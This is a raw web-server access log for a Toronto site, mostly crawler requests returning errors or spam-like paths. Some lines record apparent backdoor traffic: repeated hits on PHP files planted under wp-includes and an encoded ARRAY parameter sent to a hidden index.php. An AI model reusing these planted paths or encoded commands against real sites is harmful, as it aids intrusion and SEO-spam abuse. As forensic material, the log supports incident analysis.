| Current Path : /home/flapst5/access-logs/ |
| Current File : /home/flapst5/access-logs/cfntoronto.com.flapstart.com-ssl_log |
74.7.230.49 - - [31/Aug/2026:08:13:41 -0400] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.4; robots.txt; +https://openai.com/searchbot"
74.7.241.19 - - [31/Aug/2026:08:13:23 -0400] "GET /?v=f2r4u2i1t3e8r8y0930 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:15:01 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:17:06 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:13:53 -0400] "GET /?v=m2a3h3r8a1t4t8a7659 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:13:59 -0400] "GET /?o=204030373 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:14:08 -0400] "GET /?o=193014996 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
107.150.52.226 - - [31/Aug/2026:08:13:57 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
74.7.241.19 - - [31/Aug/2026:08:14:23 -0400] "GET /?v=e2i3g1h7t8h0l3y5542 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.19 - - [31/Aug/2026:08:14:53 -0400] "GET /?v=c2o3d6a9r5i9u0m9486 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:15:02 -0400] "GET /?o=204031029 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
198.235.24.46 - - [31/Aug/2026:08:15:14 -0400] "GET / HTTP/1.1" 500 - "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
65.109.118.212 - - [31/Aug/2026:08:15:18 -0400] "GET /?o=193016362 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:15:23 -0400] "GET /?v=u2n2p8a7c6k5e4r3520 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:15:23 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
179.43.146.218 - - [31/Aug/2026:08:15:27 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
74.7.241.19 - - [31/Aug/2026:08:15:53 -0400] "GET /?v=s2p1o8n1g0i6a2e7506 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:16:04 -0400] "GET /?o=204034399 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:16:23 -0400] "GET /?v=h2y1p9o8g0e8u3m4879 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:16:24 -0400] "GET /?o=193018018 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
52.167.144.218 - - [31/Aug/2026:08:16:50 -0400] "GET /excellent/b4e1a5u9p1e5r4e9096 HTTP/1.1" 200 33 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.19 - - [31/Aug/2026:08:16:53 -0400] "GET /?v=c2r2o6m3w7e1l6l9980 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:17:06 -0400] "GET /?o=204035013 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:17:23 -0400] "GET /?v=h2y3d6r2o9m5e7l1294 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:17:36 -0400] "GET /?o=193018330 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:17:53 -0400] "GET /?v=f2a2r1c9i7m2e6n4359 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:18:08 -0400] "GET /?o=204035239 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:18:23 -0400] "GET /?v=a2s2p9h0o7d4e0l3131 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.247.76.75 - - [31/Aug/2026:08:13:31 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323031312p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137383431312q3865383830313065333266373131323461343661336463353930323339396265222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
65.109.118.212 - - [31/Aug/2026:08:18:42 -0400] "GET /?o=193027536 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:18:46 -0400] "GET /?v=a2b3e8r1r6a9n9t4037 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:18:48 -0400] "GET /?o=204046897 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:18:53 -0400] "GET /?o=193029482 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:18:59 -0400] "GET /?o=193030964 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:19:00 -0400] "GET /?o=205001990 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:19:06 -0400] "GET /?filtrated/24000015283 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:19:09 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
107.150.52.226 - - [31/Aug/2026:08:18:41 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
65.109.118.212 - - [31/Aug/2026:08:19:09 -0400] "GET /?o=205005386 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:19:11 -0400] "GET /?o=193034776 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
104.247.76.75 - - [31/Aug/2026:08:14:18 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323035382p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137383435382q6331653261363866373135643166616161386138316166363037666361646366222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
74.7.241.19 - - [31/Aug/2026:08:19:26 -0400] "GET /?v=a2r2e3o4s0t8y0l0e79 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.19 - - [31/Aug/2026:08:19:56 -0400] "GET /?v=c2o4n0s2c5r6i6p4t72 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
51.89.38.129 - - [31/Aug/2026:08:20:06 -0400] "GET /jotted/s6i4n0a6p9i9s4t1r5u2m4 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.68.236.73 - - [31/Aug/2026:08:21:13 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.5; http://mj12bot.com/)"
65.109.118.212 - - [31/Aug/2026:08:21:29 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
107.150.52.226 - - [31/Aug/2026:08:20:14 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
74.7.241.19 - - [31/Aug/2026:08:20:16 -0400] "GET /?v=h2e9r6b2w5o5m8e7n45 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:20:17 -0400] "GET /?o=205005806 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:20:18 -0400] "GET /?o=193040630 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:23:35 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:20:46 -0400] "GET /?v=a2n6t0i4z4y7m8i6c60 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
51.68.236.73 - - [31/Aug/2026:08:21:13 -0400] "GET / HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.5; http://mj12bot.com/)"
74.7.241.19 - - [31/Aug/2026:08:21:16 -0400] "GET /?shovelspur/2864116478 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:21:29 -0400] "GET /?o=193045924 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:21:30 -0400] "GET /?o=205007008 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:21:46 -0400] "GET /?v=s2u9n4f5i8s1h0e8s40 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:25:40 -0400] "GET /robots.txt HTTP/1.1" 200 124 "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
107.150.52.226 - - [31/Aug/2026:08:21:45 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
74.7.241.19 - - [31/Aug/2026:08:22:17 -0400] "GET /?v=p2u2t4r9e0f1i0e9d19 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:22:33 -0400] "GET /?o=205012100 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:22:35 -0400] "GET /?o=194003001 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:22:47 -0400] "GET /?v=g2a5l7l5o7p8a3d6e39 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.241.19 - - [31/Aug/2026:08:23:17 -0400] "GET /?v=c2l9a7m1m8i9e9s8t44 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.247.76.75 - - [31/Aug/2026:08:18:30 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323331302p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137383731302q3334356334396262336636323166643737636638306463326561623662663563222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
74.7.241.19 - - [31/Aug/2026:08:23:47 -0400] "GET /?v=e2f6f2o3d6i5e0n7t79 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:23:35 -0400] "GET /?o=205013494 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:23:48 -0400] "GET /?o=194003051 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
104.247.76.75 - - [31/Aug/2026:08:19:07 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323334372p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137383734372q6139373562633437353364616233326137323030643665643734613535313862222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
74.7.241.19 - - [31/Aug/2026:08:24:17 -0400] "GET /?v=s2a1l3t3a3t0i9o6n67 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.247.76.75 - - [31/Aug/2026:08:19:28 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323336382p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137383736382q6234653664636132653834666235313262613261643336303131333737376661222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
179.43.146.218 - - [31/Aug/2026:08:24:36 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:24:38 -0400] "GET /?o=205018246 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
179.43.146.218 - - [31/Aug/2026:08:24:40 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
74.7.241.19 - - [31/Aug/2026:08:24:47 -0400] "GET /?v=l2i9g8h2t2y4e1a9r12 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:24:53 -0400] "GET /?o=194003963 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
52.167.144.175 - - [31/Aug/2026:08:24:56 -0400] "GET /suborbicular/terutero/p1a3p7b7o0a7t49485 HTTP/1.1" 200 33 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.211 - - [31/Aug/2026:08:25:03 -0400] "GET /shops/hamatum/s3u4b2c4l4a3s9s1486 HTTP/1.1" 200 33 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.19 - - [31/Aug/2026:08:25:17 -0400] "GET /?v=b2u2s3h2e8l6a7g9e80 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:25:38 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
104.247.76.75 - - [31/Aug/2026:08:20:35 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323433352p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137383833352q6362383638643431663964346266633331316236653665373334376532386230222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
179.43.146.218 - - [31/Aug/2026:08:25:43 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:25:40 -0400] "GET /?o=205024208 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:25:47 -0400] "GET /?v=f2a6l2d8s4t0o3o0l90 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
179.43.146.218 - - [31/Aug/2026:08:25:47 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
52.167.144.175 - - [31/Aug/2026:08:25:56 -0400] "GET /burgrave/expensefully/b3u1n0n6y4059021 HTTP/1.1" 200 33 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.175 - - [31/Aug/2026:08:26:00 -0400] "GET /shops/stargazers/a1t3m5o3s2p6h1e7r8i6c HTTP/1.1" 200 33 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:26:02 -0400] "GET /?o=205028720 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:26:04 -0400] "GET /?o=205034634 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:26:05 -0400] "GET /?o=194009033 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:26:07 -0400] "GET /?v=d2i3s2b1u0r8s6e2r94 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
65.109.118.212 - - [31/Aug/2026:08:26:16 -0400] "GET /?o=205041332 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:26:20 -0400] "GET /?o=194016293 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:26:23 -0400] "GET /?o=206002487 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:26:26 -0400] "GET /?o=194022643 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
74.7.241.19 - - [31/Aug/2026:08:26:27 -0400] "GET /?v=t2o2w8n2c0r6i7e5r17 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
66.249.65.134 - - [31/Aug/2026:08:26:38 -0400] "GET /?ronin/0313405750 HTTP/1.1" 200 18150 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.7922.173 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
107.150.52.226 - - [31/Aug/2026:08:25:57 -0400] "GET /wp-includes/br06391a/edit.php?id=823179$sp HTTP/1.1" 200 - "https://cfntoronto.com/wp-includes/br06391a/edit.php?id=823179$sp" "Mozilla/5.0"
74.7.241.19 - - [31/Aug/2026:08:26:57 -0400] "GET /?v=s2y5d1e7n2h1a9m1s64 HTTP/1.1" 500 - "https://cfntoronto.com/sitemap.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.247.76.75 - - [31/Aug/2026:08:22:07 -0400] "GET /blimqtf/mfwgxse/mfwgxse/index.php?ARRAY=7o2230223n313738383138323532372p2231223n22687474703n5p2s5p2s7n733031357631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383137383932372q3966373531396132613034633362303233633363393536323033623533303333222p2232223n223263316663373531343464353030306165366161393964646333323139653536222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q35302q35322q36332q37362q38332q3235227q HTTP/1.0" 500 - "-" "-"
179.43.146.218 - - [31/Aug/2026:08:27:07 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
179.43.146.218 - - [31/Aug/2026:08:27:11 -0400] "POST /wp-includes/Text/gmkxf1o/toqzuer/hyrqmbo/seo-config.php?action=add_link HTTP/1.1" 500 - "https://cfntoronto.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.109.118.212 - - [31/Aug/2026:08:27:13 -0400] "GET /?o=194027085 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
65.109.118.212 - - [31/Aug/2026:08:27:15 -0400] "GET /?o=206003433 HTTP/1.1" 500 - "-" "Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html)"
